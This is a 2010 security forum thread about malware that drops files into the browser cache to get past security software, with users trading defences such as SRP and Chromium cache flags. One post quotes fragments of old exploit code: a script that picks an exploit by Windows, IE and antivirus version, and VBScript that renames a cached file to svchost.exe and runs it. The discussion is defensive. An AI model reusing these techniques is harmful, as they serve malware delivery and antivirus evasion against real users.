Using the Browser Cache to Bypass Security

Discussion in 'malware problems & news' started by MrBrian, Nov 3, 2010.

Thread Status:
Not open for further replies.
  1. MrBrian

    MrBrian Registered Member

    Joined:
    Feb 24, 2008
    Posts:
    6,032
    Location:
    USA
  2. xxJackxx

    xxJackxx Registered Member

    Joined:
    Oct 23, 2008
    Posts:
    4,052
    Location:
    USA
    It looks like this was fixed already, and if it wasn't SRP would stop this from executing. Another good reason to use it. ;)
     
  3. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    Disabling browser cache would defeat it, right?

    I know IE8 doesn't allow to completely nullify browser cache (No idea about IE9 o_O). Not sure about Firefox. But, it is possible with Chromium. If no cache is happening, then no bypass.
     
  4. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    Check dis Y'all ;)

    ram.gif

    Surfing cache is ONLY in RAM = :thumb:

    w.gif

    NOTHING in these = :thumb:

    oc.gif

    dc.gif

    After closing FF i have it set to delete cache/history etc, so even ALL that gets wiped from RAM = :thumb:

    Brilliant i'd say :D
     
  5. ParadigmShift

    ParadigmShift Registered Member

    Joined:
    Aug 7, 2008
    Posts:
    203
    There's some powerful insight.
     
  6. vasa1

    vasa1 Registered Member

    Joined:
    May 1, 2010
    Posts:
    4,152
    Could you share how this (completely nullifying browser cache in Chromium) is done?
     
  7. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Yes, for sure!

    This exploit is a good example of "nothing has really changed."

    Note the screen shot in the article showing how the code checks for Operating System and Browser. Five years ago this technique emerged in the postcard.com exploit, where a link in an email sent the user to a web site that had this code to check the version of IE, the operating system, and if certain AV were present, then, dished out exploits accordingly:

    Code:
    // launching exploit which number is depends on Windows and IE versions
    function Get_Win_Version(IE_vers)
       
         if (IE_vers.indexOf('Windows 95') != -1) return "95"
         else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
         else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
         else if (IE_vers.indexOf('Windows 98') != -1) return "98"
         else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
         else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
         else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
       
    ..................
    
     case "2K":
       if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
      {  ExploitNumber=1;      
               else     // if JVM = 5.0.3810.0 or higher
                
      if ((fNortonAV==0)&&(fMcAfee==0))
     { ExploitNumber=3; 
         else
         { ExploitNumber=2;  
    
    Continuing in the article:

    An old exploit against IE6 six years ago used a similar technique, where an executable file with spoofed extension is downloaded to the browser cache to bypass security, then copied to a temp folder and renamed to .exe, and then attemps to execute:

    Code:
    on error resume next
    OOOOOOOOOOOOOwwwwwww ="[path to malware]/svchost.txt"
    
    fname1= F.BuildPath(c:\temp,"svchost.exe")
    
    Q.ShellExecute fname1,"","","o"&"pe"&"n",0
    
    [​IMG]

    Continuing:

    URLDownloadToFileA refers to the Windows command to call out to the internet to download a file. It's been used since the early ANI and WMF exploits, and most recently in PDF exploits. Here is code from a malicious PDF file:

    [​IMG]

    [​IMG]

    [​IMG]

    So, it's a cat-and-mouse game: vulnerabilities are patched, security products monitor actions of malware that attempts to execute, malware authors find new ways to bypass these things with new vulnerabilities, etc, etc.

    But the goal is the same old thing: download/execute a malware file.

    If protection against that is part of one's security setup, that takes care of a lot of exploits!

    ----
    rich
     
  8. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    Cache does happen, but it doesn't get written to disk, due to the restrictions I have in place.

    I have Chromium to start with command switch --disk-cache-size=N (N is the value in bytes of the cache size)

    Some say 0 doesn't prevent any caching; others say 1 works, meaning the cache will have a limit size of 1 byte.

    Either way, I have my Chromium profiles with an ACL that denies write permissions. I had to set to the full profile folder, because setting the Cache folder with an ACL denying write permissions wouldn't work, because Chromium would bypass it, removing the deny permissions.

    So, while caching does happen, it only happens in memory, but it won't be written to disk.

    I should had expressed myself better, sorry. :(

    Maybe you'll find this an easier root for you, as well. It was for me.

    -Edit-

    Forgot this part --media-cache-size=1

    -Edit 2-

    You may also add the following instead:

    --disk-cache-dir="path", and set the folder with a write deny permission. It should work fine as well.
     
    Last edited: Nov 5, 2010
Loading...
Thread Status:
Not open for further replies.